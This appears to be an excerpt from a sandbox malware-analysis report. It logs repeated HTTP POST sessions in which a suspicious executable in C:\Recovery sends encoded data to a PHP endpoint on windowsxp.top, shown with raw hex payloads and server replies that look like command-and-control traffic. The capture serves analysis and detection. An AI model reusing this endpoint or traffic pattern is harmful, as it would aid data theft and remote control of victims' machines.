                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8LMQziq7ODrhtcQovcWCQSTuLqLDX3saeWNGKUmKZ2LxAEtbsklT3NZDZut4r4vLOUxGWoDbSDVQlAIf%2BKH1fA1FNxRYV3eY%2F2WGJzTxfUdLlo5833ERodZxFR8J93h"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b87dae2bb792-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1270175&cwnd=85&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50100 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:02.015734911 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: windowsxp.top
Content-Length: 1716
Expect: 100-continue
Oct 27, 2024 19:24:02.431111097 CET | 1716 | OUT | Data Raw: 50 57 58 5d 5e 5a 56 50 54 58 57 54 54 57 5b 5d 59 50 5b 51 52 56 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX]^ZVPTXWTTW[]YP[QRVRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'.? )*!%#.$_$+';7)""<,-8>=:!Y##X(+
Oct 27, 2024 19:24:02.610447884 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:02.826740026 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:02.919061899 CET | 922 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZhwTGt7No6wZmMQvJxUAPRYlqQyOCtwm4gKp2X%2FqVZzc44PevKWXxIpLH6yoyl9k3Jv2tP6RVi57RmPFOqSzd6NJqhbHZdlHs%2FGxvOdH9i1YEnwFK1%2FQ%2FNXl2n5ILTy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b87febfc4648-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1367327&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5e 22 3e 24 56 2a 2f 32 08 3d 31 0b 5e 33 02 0b 11 3b 0c 02 5a 29 03 36 0f 2d 06 2a 54 30 0a 03 0b 2b 17 30 13 20 00 27 0b 3d 1f 21 5e 00 1c 24 04 21 2d 39 53 26 02 30 5b 30 09 3c 17 21 13 3f 5c 3d 10 2e 0c 3c 39 2c 5e 3f 28 38 0b 2f 11 03 55 26 2a 3e 1c 2c 16 2e 5e 3f 3a 2a 54 0c 14 21 12 2e 2f 1d 01 21 1f 3d 1f 28 21 3b 00 30 00 0e 50 27 03 2b 0b 28 02 2f 5e 3f 3e 35 5b 36 3f 20 58 2a 28 08 14 33 03 2f 1e 2a 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"^">$V*/2=1^3;Z)6-*T0+0 '=!^$!-9S&0[0<!?\=.<9,^?(8/U&*>,.^?:*T!./!=(!;0P'+(/^?>5[6? X*(3/*"T")S0YP0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50101 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:03.114780903 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: windowsxp.top
Content-Length: 1012
Expect: 100-continue
Connection: Keep-Alive
Oct 27, 2024 19:24:03.462227106 CET | 1012 | OUT | Data Raw: 50 55 58 5b 5e 52 53 54 54 58 57 54 54 5d 5b 5d 59 5b 5b 58 52 5e 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX[^RSTTXWTT][]Y[[XR^RST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%=759&55<:$%+<-.$>Y8#8/[8>>^-!Y##X(
Oct 27, 2024 19:24:03.709556103 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:03.913897038 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOQA5Nr%2BRNOUeMyccaJ9Hxxy6ynraWyl0s2LkyoP3yTlsYJAM6i0y3d%2BIQ4em6Bx%2FE0shqCsaUk399Vd52uFORVl4DiUZnHdIy0Zx2MFNAjlNknuiYZjDPLyyWlWC%2F53"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b886ca9b6c7a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1311594&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 50102 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:04.051330090 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: windowsxp.top
Content-Length: 1008
Expect: 100-continue
Oct 27, 2024 19:24:04.400684118 CET | 1008 | OUT | Data Raw: 55 54 5d 59 5e 52 53 52 54 58 57 54 54 55 5b 58 59 5c 5b 5b 52 53 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UT]Y^RSRTXWTTU[XY\[[RSRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&>$"*%"7-#0(?;>(S=8W"2#_87Y*/%./!Y##X(+
Oct 27, 2024 19:24:04.655396938 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:04.854984999 CET | 770 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21DYQJfVhBlil6WUcBlyKf3SFUvvjcnz1B0FQ9fRBnOiKlcF7226MXWPSEWDw5lLR10fFCQFEsnFLc702GrmApxt%2FcDj9YsmnEDEi9kycLmXNTEdQdMYFOsQI6nG%2BrKv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b88cb8a3cb75-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1126848&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 50103 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:07.482633114 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: windowsxp.top
Content-Length: 1012
Expect: 100-continue
Oct 27, 2024 19:24:07.871526957 CET | 1012 | OUT | Data Raw: 55 53 58 5f 5e 52 53 54 54 58 57 54 54 53 5b 5b 59 50 5b 51 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USX_^RSTTXWTTS[[YP[QR^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&7!9%X"4^-4_0(#8><# !3X,;Z>),/!Y##X(;
Oct 27, 2024 19:24:08.085985899 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:08.298078060 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3evz9vgncM21DTp9y3EKJsoWuukBOthQ4Q3mHRhZm4KqnwlOdkeC9O9ImKnqaeQbQGpTcI4G4staE19Ng0Blgu%2FFofbmLEG2wS9ZAqf7%2FVxVbUshRS1tjfSO%2FrMc5798"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8a229e4346d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1217830&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  91192.168.2.450104188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:07.938731909 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:08.290272951 CET  1716               OUT        Data Raw: 50 56 58 5e 5e 53 56 5f 54 58 57 54 54 56 5b 5e 59 50 5b 5a 52 53 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVX^^SV_TXWTTV[^YP[ZRSRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%X"*Y5.0^';+/S)/(W4/X/[(=,"[9!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:08.543351889 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:08.735501051 CET  921                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObFYAdmFQ0K2NobIQRCQzSE9YTYg9EsC42eKdnRN8nj8AahQkhtozxLAZxf3JK6uaDSt8AoCk3%2Fu6ytMWgphLVXKn0fV64RENKJHkMyQ5%2B2CPGvGONlZWXDP93u%2FszB9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8a50af28d29-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1153784&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 07 37 07 30 11 3d 02 3d 56 3e 0f 0f 58 33 3f 32 01 3b 21 33 03 29 03 35 12 2e 28 00 1c 27 1d 35 0b 28 2a 3b 00 23 2d 24 57 3d 1f 21 5e 00 1c 24 06 36 3d 21 51 25 5d 3c 5a 30 30 28 5c 21 03 20 07 29 10 0b 55 3c 29 27 07 3c 5e 30 09 2f 3f 2d 1f 25 29 3a 5a 2c 28 29 07 3f 10 2a 54 0c 14 21 11 39 01 33 03 22 21 25 54 3e 0c 1a 11 27 3d 23 0b 30 14 37 0d 3f 12 23 59 3f 13 31 58 21 2c 23 04 3c 16 22 14 27 5b 23 10 3e 3e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!70==V>X3?2;!3)5.('5(*;#-$W=!^$6=!Q%]<Z00(\! )U<)'<^0/?-%):Z,()?*T!93"!%T>'=#07?#Y?1X!,#<"'[#>>"T")S0YP0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  92          192.168.2.4  50105        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:08.416589975 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:08.774347067 CET  1012               OUT        Data Raw: 50 56 5d 5f 5b 5f 53 53 54 58 57 54 54 54 5b 5d 59 58 5b 5e 52 52 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV]_[_SSTXWTTT[]YX[^RRR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%-(!\)Y"6.$Y'(;-.+>?#",[7[),/!Y##X('
                                                                                                                  Oct 27, 2024 19:24:09.005068064 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:09.198709011 CET  776                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65%2FHkWdpKgLy%2BlqH3JW4C3s0l%2F1IRW2dkawJlp%2FLuGUYXur11gI0XMylgc6YZLzTZq3fSvEQBOqbSIrVe%2FojUGAYcpPsZcA7BWJ3O9v87QP3q0ap4gyWjQfbZFuzNQMY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8a7ebbf6b04-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1310407&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  93          192.168.2.4  50106        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:09.350784063 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:09.696307898 CET  1008               OUT        Data Raw: 55 52 5d 59 5e 5e 56 56 54 58 57 54 54 55 5b 5c 59 5f 5b 5f 52 50 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR]Y^^VVTXWTTU[\Y_[_RPR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y2.0Y 95_"6Z.$^;-> W(/ T 2#8.<>5,?!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:09.949908018 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:10.166029930 CET  777                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=io%2BldVK0y41g2OgWKAI7OFYHZ%2BC80vKCdz9oM%2BSDquJB%2BIc6uuxqUEkgvGuqvvNIk6aLxs4ipK4JL%2F5fc7v6YyMgm3VnIFKYOk4DPkT13T1Vn4HazbSHVyNoHrS%2FDRzf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8adcbf30bcf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1747&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=891076&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  94          192.168.2.4  50107        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:10.289185047 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:10.633781910 CET  1012               OUT        Data Raw: 50 55 58 5a 5b 59 53 53 54 58 57 54 54 51 5b 5d 59 58 5b 59 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXZ[YSSTXWTTQ[]YX[YRQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%5:!_68\:' ^$<V/ U=? V"! ->7Y>Z"^,/!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:10.885483980 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:11.088818073 CET  775                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4MWK9DNNCAns8JY92mA5XN0x%2FbLUlGZhKLUXAOlad6opN38%2FuyTHCv31wuSqTVA6%2BCnXRjFO3CzWKOnIPRA2xuALyOqarr8NAT4Op6%2BhPOsR9qpaeiowshzO%2BP2zgVN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8b3ae514614-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1364750&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  95          192.168.2.4  50108        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:11.218549967 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:11.571166992 CET  1012               OUT        Data Raw: 50 52 5d 5f 5b 5c 56 55 54 58 57 54 54 5d 5b 5a 59 5a 5b 51 52 52 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]_[\VUTXWTT][ZYZ[QRRR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1"96!.7'+;$>Q#13/-8>,>Z-!Y##X(
